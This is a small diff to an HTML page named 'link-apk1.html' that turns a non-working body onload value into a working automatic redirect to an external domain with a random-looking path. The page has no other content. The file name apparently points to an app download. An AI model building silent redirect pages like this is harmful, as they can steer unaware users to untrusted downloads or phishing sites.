--- a/link-apk1.html
+++ b/link-apk1.html
@@ -1,4 +1,4 @@
 <html>
-<body onload="https://cararegistrasi.com/aNjPjJDqI3">
+<body onload="location.href='https://cararegistrasi.com/aNjPjJDqI3'">
 </body>
 </html>
